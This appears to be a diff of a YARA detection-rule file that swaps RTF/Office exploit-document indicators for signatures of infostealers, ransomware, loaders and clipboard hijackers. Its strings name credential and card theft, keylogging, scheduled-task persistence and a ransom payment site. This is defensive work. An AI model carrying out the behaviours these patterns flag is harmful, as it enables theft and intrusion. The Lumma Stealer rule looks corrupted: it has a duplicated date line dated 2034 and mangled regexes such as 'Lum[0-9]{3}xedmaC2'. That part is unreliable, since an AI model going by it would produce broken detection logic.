-		$cmd6 = { 00 1E 00 00 00 [1-4] 00 00 (6E|4E) (65|45) (74|54) 2E (77|57) (65|45) (62|42) (63|43) (6C|4C) (69|49) (65|45) (6E|4E) (74|54) (00|20) }
+		$c1 = "/bot/" ascii
+		$c2 = "key=" ascii
+		$f1 = "main.isRunning" fullword ascii
+		$f2 = "main.writePid" fullword ascii
+		$f3 = "main.isStartupEnabled" fullword ascii
+		$f4 = "main.enableStartup" fullword ascii
+		$f5 = "main.waitOpenClipboard" fullword ascii
+		$f6 = "main.clipboardWrite" fullword ascii
+		$f7 = "main.setOnline" fullword ascii
+		$f8 = "main.getRegex" fullword ascii
+		$v2_1 = "{0}/bot/{1}?{2}" wide
+		$v2_2 = /\{0\}\\\{1\}\.(exe|pid)/ wide
+		$v2_3 = "schtasks /create /tn" wide
+		$v2_4 = "SetOnline" fullword ascii
+		$v2_5 = "IsAutoRunInstance" fullword ascii
+		$v2_6 = "GetNewAddress" fullword ascii
+		$v2_7 = "RefreshRegex" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and any of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $c* ) and 5 of ( $f* ) ) or ( 1 of ( $c* ) and 7 of ( $f* ) ) or ( 6 of ( $v2* ) ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Bitsadmin_Downloader : FILE
+rule DITEKSHEN_MALWARE_Win_Mystic : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and BITSAdmin. Common exploit + dropper behavior."
+		description = "Hunt for Mystic Infostealer"
 		author = "ditekSHen"
-		id = "e96a6f18-9a5e-58ca-829e-c82b444ad403"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "959eceab-0a2c-5361-b8f4-6739033ffae5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L428-L451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9614-L9628"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "39a07a0af243e929a6b3df48b6cf8a9d30bc8ef9e7deac494348945427b015e7"
+		logic_hash = "26e0b85141df818d70124c0b19b5b6a05ac24ae679724d7a8ad94415a6462d17"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "910002-910003"
-		snort3_sid = "910001"
-		clamav_sig = "INDICATOR.RTF.EquationBITSAdminDownloader"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$ba = "6269747361646d696e" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$s1 = "LaStFiLe:)" ascii wide
+		$s2 = "LaStPrOcEsS:)" ascii wide
+		$s3 = "credit_cards" ascii wide
+		$s4 = "number_of_processors" ascii wide
+		$s5 = "computername" ascii wide
+		$p1 = "G:\\Projects\\Python\\morpher\\" ascii wide
+		$p2 = /G:\\Projects\\stealer\\.{15}\\Release\\.{5,25}\.pdb/ ascii wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $eq and $ba ) and 1 of ( $obj* ) )
+		( uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $p* ) and 3 of ( $s* ) ) ) ) or ( all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Certutil_Downloader : FILE
+rule DITEKSHEN_MALWARE_Linux_Buhti : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and CertUtil. Common exploit + dropper behavior."
+		description = "Detects Buhti Ransomware"
 		author = "ditekSHen"
-		id = "a47f31f9-91fc-5009-8aff-2b9e334c3139"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L453-L476"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9630-L9643"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6c62957ce40ed755a84bd9aa8900e4990c466097d6df55c539b289bf50fe94e"
+		logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "910006-910007"
-		snort3_sid = "910003"
-		clamav_sig = "INDICATOR.RTF.EquationCertUtilDownloader"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$cu = "636572747574696c" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$x1 = "buhtiRansom" ascii
+		$x2 = "://satoshidisk.com/pay/" ascii
+		$s1 = "main.encrypt_file" fullword ascii
+		$s2 = "/path/to/be/encrypted" ascii
+		$s3 = "Restore-My-Files.txt" ascii
+		$s4 = ".buhti390625" ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $eq and $cu ) and 1 of ( $obj* ) )
+		uint16( 0 ) == 0x457f and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of them )
 }
-rule DITEKSHEN_INDICATOR_RTF_Equation_Powershell_Downloader : FILE
+rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE
 {
 	meta:
-		description = "Detects RTF documents that references both Microsoft Equation Editor and PowerShell. Common exploit + dropper behavior."
+		description = "Detects CommonMagic and Modules"
 		author = "ditekSHen"
-		id = "5d1d65ef-e183-5a0d-a0fa-d0d5f09f21a1"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "cbebe334-9b66-5931-8f92-25d080f7fd6a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L478-L501"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9645-L9660"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0b8b9b7b40f8b4d659de9e025a65d5c6b64c6066bb618a3e7ed3c318f70befe5"
+		logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort2_sid = "910004-910005"
-		snort3_sid = "910002"
-		clamav_sig = "INDICATOR.RTF.EquationPowerShellDownloader"
 
 	strings:
-		$eq = "0200000002CE020000000000C000000000000046" ascii nocase
-		$ps = "706f7765727368656c6c" ascii nocase
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
+		$p1 = "\\\\.\\pipe\\PipeMd" wide
+		$p2 = "\\\\.\\pipe\\PipeCrDtMd" wide
+		$p3 = "\\\\.\\pipe\\PipeDtMd" wide
+		$s1 = "graph.microsoft.com" fullword wide
+		$s2 = "CreateNamedPipe" ascii
+		$s3 = "\\CommonCommand\\" wide
+		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide
+		$ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and ( ( $ps and $eq ) and 1 of ( $obj* ) )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $p* ) and 1 of ( $s* ) ) or ( 1 of ( $ua* ) and 1 of ( $s* ) and 1 of ( $p* ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_LNK_Shell_Explorer_Execution : FILE
+rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE
 {
 	meta:
-		description = "detects RTF files with Shell.Explorer.1 OLE objects with embedded LNK files referencing an executable."
+		description = "Detects GreetingGhoul Cryptocurrency Infostealer"
 		author = "ditekSHen"
-		id = "2cac4dd8-086a-5220-a658-94cedd9cf7c3"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "42791b26-1cda-5bf3-b955-9de2dda1d63b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L503-L517"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9662-L9679"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c11a37425e260692e11dc8fca317611106245d1590081a7038036ad568702f8"
+		logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$clsid = "c32ab2eac130cf11a7eb0000c05bae0b" ascii nocase
-		$lnk_header = "4c00000001140200" ascii nocase
-		$http_url = "6800740074007000" ascii nocase
-		$file_url = "660069006c0065003a" ascii nocase
+		$s1 = "peer_list" fullword ascii
+		$s2 = "seed_hash" fullword ascii
+		$s3 = "pool_id" fullword ascii
+		$s4 = "%smutex=%s:%lu" ascii
+		$s5 = "miner.cfg" fullword ascii
+		$s6 = "{\"method\": \"%s\"%s}" ascii
+		$s7 = "/app/manager/%s" ascii
+		$s8 = "X-VNC-STATUS" fullword ascii
+		$s9 = "%s\\%lu.zip" fullword ascii
+		$s10 = "\\??\\%programdata%\\" wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and $clsid and $lnk_header and ( $http_url or $file_url )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Forms_HTML_Execution : FILE
+rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE
 {
 	meta:
-		description = "detects RTF files with Forms.HTML:Image.1 or Forms.HTML:Submitbutton.1 OLE objects referencing file or HTTP URLs."
+		description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers"
 		author = "ditekSHen"
-		id = "26b21c94-9192-53be-808b-b553f87769e1"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "960830ba-df0d-539d-be2a-7778229f79bd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L519-L533"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9681-L9703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e8a2072971c40d6fbc0e0265a9adfbe4faa04d0f3c6962fda443da33aa06906"
+		logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$img_clsid = "12d11255c65ccf118d6700aa00bdce1d" ascii nocase
-		$sub_clsid = "10d11255c65ccf118d6700aa00bdce1d" ascii nocase
-		$http_url = "6800740074007000" ascii nocase
-		$file_url = "660069006c0065003a" ascii nocase
+		$n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide
+		$n2 = "Stealerium" ascii wide
+		$x1 = "@FlatLineStealer" ascii wide
+		$x2 = "@CashOutGangTalk" ascii wide
+		$x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
+		$x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
+		$s1 = "Timeout /T 2 /Nobreak" fullword wide
+		$s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
+		$s3 = "Downloading file: \"{file}\"" wide
+		$s4 = "/bot{0}/getUpdates?offset={1}" wide
+		$s5 = "send command to bot!" wide
+		$s6 = " *Keylogger " fullword wide
+		$s7 = "*Stealer" wide
+		$s8 = "Bot connected" wide
+		$s9 = "### {0} ### ({1})" wide
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and filesize < 1500KB and ( $img_clsid or $sub_clsid ) and ( $http_url or $file_url )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_PUB_MSIEXEC_Remote : FILE
+rule DITEKSHEN_MALWARE_Win_Darkeye : FILE
 {
 	meta:
-		description = "detects VB-enable Microsoft Publisher files utilizing Microsoft Installer to retrieve remote files and execute them"
+		description = "Detects DarkEye infostealer"
 		author = "ditekSHen"
-		id = "518db2bb-174b-54c4-b330-1e8a8e36265d"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "5296fe28-b54e-5d0f-aa2f-2050db585d82"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L535-L549"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9751-L9770"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be5407e6e6e21e77f6de1d3a378996bfc6ce4326986aa03eb152e772bb495184"
+		logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Microsoft Publisher" ascii
-		$s2 = "msiexec.exe" ascii
-		$s3 = "Document_Open" ascii
-		$s4 = "/norestart" ascii
-		$s5 = "/i http" ascii
-		$s6 = "Wscript.Shell" fullword ascii
-		$s7 = "\\VBE6.DLL#" wide
+		$c1 = /Prynt(\s)?Stealer/ ascii wide
+		$c2 = /WorldWind(\s)?Stealer/ ascii wide
+		$c3 = "ToxicEye" ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$s1 = "--- Clipper" wide
+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and 6 of them
+		uint16( 0 ) == 0x5a4d and not any of ( $c* ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_RTF_Ancalog_Exploit_Builder_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE
 {
 	meta:
-		description = "Detects documents generated by Phantom Crypter/Ancalog"
+		description = "Invalid Printer (in2al5d p3in4er) Loader"
 		author = "ditekSHen"
-		id = "01e7f949-8ced-5355-978c-34d6e639e61a"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "9b0a59e1-8105-5687-83b2-fb96229f59f9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L551-L563"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9772-L9782"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e458be78ca8975d067110dc38119437b3ffe55afdbfdab47468c9ed74bba9f9d"
+		logic_hash = "d14d53b2a73952244641f4e68a3dd5af8cb1e2bfc5936f300f9347b4881ceeb8"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		snort2_sid = "910000-910001"
-		snort3_sid = "910000"
-		clamav_sig = "INDICATOR.RTF.AncalogExploitBuilderDocument"
+		quality = 75
+		tags = "FILE"
+		clamav_sig = "MALWARE.Win.InvalidPrinter"
 
 	strings:
-		$builder1 = "{\\*\\ancalog" ascii
-		$builder2 = "\\ancalog" ascii
+		$s1 = "in2al5d p3in4er" fullword ascii
+		$s2 = "CreateDXGIFactory" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of ( $builder* )
+		uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them
 }
-rule DITEKSHEN_INDICATOR_RTF_Threadkit_Exploit_Builder_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Raccoonv2 : FILE
 {
 	meta:
-		description = "Detects vaiations of RTF documents generated by ThreadKit builder."
+		description = "Detects Raccoon Stealer 2.0, also referred to as RecordBreaker"
 		author = "ditekSHen"
-		id = "f4a4e7f0-ea2f-523f-9634-a939dc90706e"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "2fc8313f-42f4-5b7e-8ae6-20455f736064"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L565-L582"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9784-L9805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f2308ac6ae5345e0c783871dd6b471397ec83ba7194db5cc74c8984d84c2c0c2"
+		logic_hash = "d47bb9051923147010452bcd6e7c370c2ff9ea9095bcb920b64f69873b15ec16"
 		score = 75
-		quality = 50
+		quality = 25
 		tags = "FILE"
 
 	strings:
-		$obj1 = "\\objhtml" ascii
-		$obj2 = "\\objdata" ascii
-		$obj3 = "\\objupdate" ascii
-		$obj4 = "\\objemb" ascii
-		$obj5 = "\\objautlink" ascii
-		$obj6 = "\\objlink" ascii
-		$obj7 = "\\mmath" ascii
-		$pat1 = /\\objupdate\\v[\\\s\n\r]/ ascii
+		$f1 = "sgnl_" fullword ascii
+		$f2 = "tlgrm_" fullword ascii
+		$f3 = "ews_" fullword ascii
+		$f4 = "grbr_" fullword ascii
+		$f5 = "dscrd_" fullword ascii
+		$f6 = "wlts_" fullword ascii
+		$f7 = "scrnsht_" fullword ascii
+		$f8 = "sstmnfo_" fullword ascii
+		$s1 = "machineId=" fullword ascii
+		$s2 = "&configId=" fullword ascii
+		$s3 = "URL:%s" fullword ascii
+		$s4 = "USR:%s" fullword ascii
+		$s5 = "PASS:%s" fullword ascii
+		$s6 = "Content-Type: application/x-object" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 2 of ( $obj* ) and 1 of ( $pat* )
+		(( uint16( 0 ) == 0x5a4d and ( 4 of ( $f* ) or all of ( $s* ) or 7 of them ) ) or 10 of them )
 }
-rule DITEKSHEN_INDICATOR_XML_Legacydrawing_Autoload_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Truebot : FILE
 {
 	meta:
-		description = "detects AutoLoad documents using LegacyDrawing"
+		description = "Detects TrueBot"
 		author = "ditekSHen"
-		id = "ce116601-7048-5a3f-9b73-5127ca3b359e"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "7210a0bd-d310-55bf-bb0c-14cadb59bd67"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L584-L594"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9807-L9827"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a038636f5e8e7837c2209072f1659b921c8a9a48d4ed153e735915cf1f7f3fcc"
+		logic_hash = "a92141ef0aa7d68b3594a0f56c0370498fe5751a472c9011ac8b92ae46e88e53"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "<legacyDrawing r:id=\"" ascii
-		$s2 = "<oleObject progId=\"" ascii
-		$s3 = "autoLoad=\"true\"" ascii
+		$s1 = "%s\\rundll32.exe" fullword wide
+		$s2 = "ChkdskExs" fullword wide
+		$s3 = "n=%s&o=%s&a=%d&u=%s&p=%s&d=%s" ascii
+		$s4 = "KLLS" fullword ascii
+		$s5 = "%s\\%08x-%08x.ps1" fullword ascii
+		$s6 = ".JSONIP" ascii
+		$s7 = "CreateProcessAsUserW res %d err %d" fullword ascii
+		$s8 = "ldr_sys64.dll" fullword ascii
+		$s9 = "SVCHOST" fullword ascii
+		$s10 = "WINLOGON" fullword ascii
+		$s11 = { 67 6f 6f 67 6c 65 2e 63 6f 6d 00 00 00 00 00 00
+                2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00
+                20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 }
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_XML_OLE_Autoload_Document : FILE
+rule DITEKSHEN_MALWARE_Win_Lummastealer : FILE
 {
 	meta:
-		description = "detects AutoLoad documents using OLE Object"
+		description = "Detects Lumma Stealer"
 		author = "ditekSHen"
-		id = "b3d682c3-641a-554a-8607-e99d07e9a57d"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "b54521ab-4a31-5c1c-8ef2-b08b0f713693"
+		date = "2034-02-17"
+		date = "2034-02-17"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L596-L606"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9829-L9854"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b262a9f8e82dea55afc26acac731827b64f52069a2bf314f716832b3dfc2c04f"
+		logic_hash = "74014c5bcc85977b90faed93b348c34e47ee033b06c2f145348ca9c54c27bda5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		clamav1 = "MALWARE.Win.Trojan.LummaStealer"
 
 	strings:
-		$s1 = "autoLoad=\"true\"" ascii
-		$s2 = "/relationships/oleObject\"" ascii
-		$s3 = "Target=\"../embeddings/oleObject" ascii
+		$x1 = /Lum[0-9]{3}xedmaC2,\sBuild/ ascii
+		$x2 = /LID\(Lu[0-9]{3}xedmma\sID\):/ ascii
+		$s1 = /os_c[0-9]{3}xedrypt\.encry[0-9]{3}xedpted_key/ fullword ascii
+		$s2 = "c2sock" wide
+		$s3 = "c2conf" wide
+		$s4 = "TeslaBrowser/" wide
+		$s5 = "Software.txt" fullword wide
+		$s6 = "SysmonDrv" fullword
+		$s7 = "*.eml" fullword wide nocase
+		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
+		$s9 = "- Screen Resoluton:" ascii
+		$s10 = "lid=%s" ascii
+		$s11 = "&ver=" ascii
+		$s12 = "769cb9aa22f4ccc412f9cbc81feedd" fullword wide
+		$s13 = "gapi-node.io" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or 5 of ( $s* ) or 7 of them )
 }
-rule DITEKSHEN_INDICATOR_XML_Squiblydoo_1 : FILE
+rule DITEKSHEN_MALWARE_Win_Clipbanker03 : FILE
 {
 	meta:
-		description = "detects Squiblydoo variants extracted from exploit RTF documents."
+		description = "Detects ClipBanker"
 		author = "ditekSHen"
-		id = "cac326ab-cc31-59c1-bd12-285db1675695"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "57ba7d33-eba4-5bc1-9893-5441e439b900"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L608-L622"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9884-L9904"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b52ebd76dd4e60f6bd5cb19fed3a72b6aeb90dea95f0d1be61dcfff39ea674ae"
+		logic_hash = "29bbb833c9aecc18b398b8c0d80649994f4992277d1aa2ee4ae8e319b59125d5"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$slt = "<scriptlet" ascii
-		$ws1 = "CreateObject(\"WScript\" & \".Shell\")" ascii
-		$ws2 = "CreateObject(\"WScript.Shell\")" ascii
-		$ws3 = "ActivexObject(\"WScript.Shell\")" ascii
-		$r1 = "[\"run\"]" nocase ascii
-		$r2 = ".run \"cmd" nocase ascii
-		$r3 = ".run chr(" nocase ascii
+		$s1 = "UNIC_KEY" fullword wide
+		$s2 = "[StartUp]" fullword wide
+		$s3 = "[Kill]" fullword wide
+		$s4 = "[antivm]" fullword wide
+		$s5 = "AntiVM" fullword ascii
+		$s6 = "AntiKill" fullword ascii
+		$s7 = "hWndRemove" fullword ascii
+		$s8 = "/Clip(watch|Chang|Mon)/" fullword ascii
+		$w1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" fullword wide
+		$w2 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" fullword wide
+		$w3 = "/create /sc MINUTE /mo 1 /tn \"Windows Service\" /tr \"" fullword wide
+		$w4 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" fullword wide
+		$w5 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
 
 	condition:
-		( uint32( 0 ) == 0x4d583f3c or uint32( 0 ) == 0x6d783f3c ) and $slt and 1 of ( $ws* ) and 1 of ( $r* )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or all of ( $w* ) or 6 of them )
 }
-rule DITEKSHEN_INDICATOR_OLE_Suspicious_Reverse : FILE
+rule DITEKSHEN_MALWARE_Win_Dotrunpex : FILE
 {
 	meta:
-		description = "detects OLE documents containing VB scripts with reversed suspicious strings"
+		description = "Detects dotRunpeX injector"
 		author = "ditekSHen"
-		id = "a7f4d18d-add6-5df2-9a8c-f88d8e3766da"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "4845edc1-110c-59a2-ace0-57a62b1e69e8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L624-L644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9906-L9918"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "04950549eede23b7006103539f20437713a54138c073d9805048392ea0a3df2a"
-		score = 65
-		quality = 71
+		logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0"
+		score = 75
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$vb = "\\VBE7.DLL" ascii
-		$cmd1 = "CMD C:\\" nocase ascii
-		$cmd2 = "CMD /c " nocase ascii
-		$kw1 = "]rAHC[" nocase ascii
-		$kw2 = "ekOVNI" nocase ascii
-		$kw3 = "EcaLPEr" nocase ascii
-		$kw4 = "TcEJBO-WEn" nocase ascii
-		$kw5 = "eLbAirav-Teg" nocase ascii
-		$kw6 = "ReveRSE(" nocase ascii
-		$kw7 = "-JOIn" nocase ascii
+		$s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide
+		$s2 = "KoiVM" ascii
+		$s3 = "RunpeX.Stub.Framework" wide
